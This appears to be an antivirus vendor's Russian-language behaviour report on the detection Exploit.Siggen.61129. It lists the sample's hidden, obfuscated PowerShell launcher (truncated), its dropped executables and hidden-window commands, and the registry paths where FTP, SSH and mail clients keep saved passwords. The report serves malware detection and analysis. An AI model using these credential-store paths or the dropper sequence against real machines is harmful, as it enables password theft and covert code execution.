Exploit.Siggen.61129

Для обеспечения автозапуска и распространения

Создает или изменяет следующие файлы

Вредоносные функции

Запускает на исполнение (эксплоит)

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function c8e97 {param($t28bcf7)$c677a4='t41e9';$jcfb2='';for ($i=0; $i -lt $t28bcf7.length;$i+=2){$ye1b8=[convert]::ToByte($t28bcf7.Substring($i,2),16);$jcfb2+=[char]($ye1...

Внедряет код в

следующие пользовательские процессы:

Ищет ветки реестра, отвечающие за хранение паролей сторонними программами

[<HKCU>\Software\LinasFTP\Site Manager]
[<HKCU>\Software\FlashPeak\BlazeFtp\Settings]
[<HKCU>\Software\Ghisler\Total Commander]
[<HKCU>\Software\Far\Plugins\FTP\Hosts]
[<HKCU>\Software\Far2\Plugins\FTP\Hosts]
[<HKCU>\Software\VanDyke\SecureFX]
[<HKLM>\Software\Wow6432Node\NCH Software\Fling\Accounts]
[<HKCU>\Software\NCH Software\Fling\Accounts]
[<HKLM>\Software\Wow6432Node\NCH Software\ClassicFTP\FTPAccounts]
[<HKCU>\Software\NCH Software\ClassicFTP\FTPAccounts]
[<HKCU>\Software\SimonTatham\PuTTY\Sessions]
[<HKLM>\Software\Wow6432Node\SimonTatham\PuTTY\Sessions]
[<HKCU>\Software\Martin Prikryl]
[<HKLM>\Software\Wow6432Node\Martin Prikryl]
[<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]

Читает файлы, отвечающие за хранение паролей сторонними программами

Изменения в файловой системе

Создает следующие файлы

%TEMP%\c8oy2-8e.0.cs
%TEMP%\c8oy2-8e.cmdline
%TEMP%\c8oy2-8e.out
%TEMP%\csc349e.tmp
%TEMP%\res34af.tmp
%TEMP%\c8oy2-8e.dll
%APPDATA%\tb59ec1.exe
%HOMEPATH%\jgfn.exe
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
%PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
%LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
%APPDATA%\e6f983\35a09b.hdb
%APPDATA%\e6f983\35a09b.lck

Присваивает атрибут 'скрытый' для следующих файлов

Удаляет следующие файлы

Перемещает следующие файлы

Подменяет следующие файлы

%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1960123792-2022915161-3775307078-1001\f58155b4b1d5a524ca0261c3ee99fb50_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee

Сетевая активность

Подключается к

TCP

Запросы HTTP GET

Запросы HTTP POST

UDP

Другое

Создает и запускает на исполнение

'%APPDATA%\tb59ec1.exe'
'%HOMEPATH%\jgfn.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function c8e97 {param($t28bcf7)$c677a4='t41e9';$jcfb2='';for ($i=0; $i -lt $t28bcf7.length;$i+=2){$ye1b8=[convert]::ToByte($t28bcf7.Substring($i,2),16);$jcfb2+=[char]($ye1...' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\c8oy2-8e.cmdline"' (со скрытым окном)
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES34AF.tmp" "%TEMP%\CSC349E.tmp"' (со скрытым окном)
'%WINDIR%\syswow64\cmd.exe' /c copy "%APPDATA%\tb59ec1.exe" "%HOMEPATH%\jgfn.exe"' (со скрытым окном)
'%WINDIR%\syswow64\cmd.exe' /c, "%HOMEPATH%\jgfn.exe"' (со скрытым окном)

Запускает на исполнение

'%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\c8oy2-8e.cmdline"
'%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES34AF.tmp" "%TEMP%\CSC349E.tmp"
'%WINDIR%\syswow64\cmd.exe' /c copy "%APPDATA%\tb59ec1.exe" "%HOMEPATH%\jgfn.exe"
'%WINDIR%\syswow64\cmd.exe' /c, "%HOMEPATH%\jgfn.exe"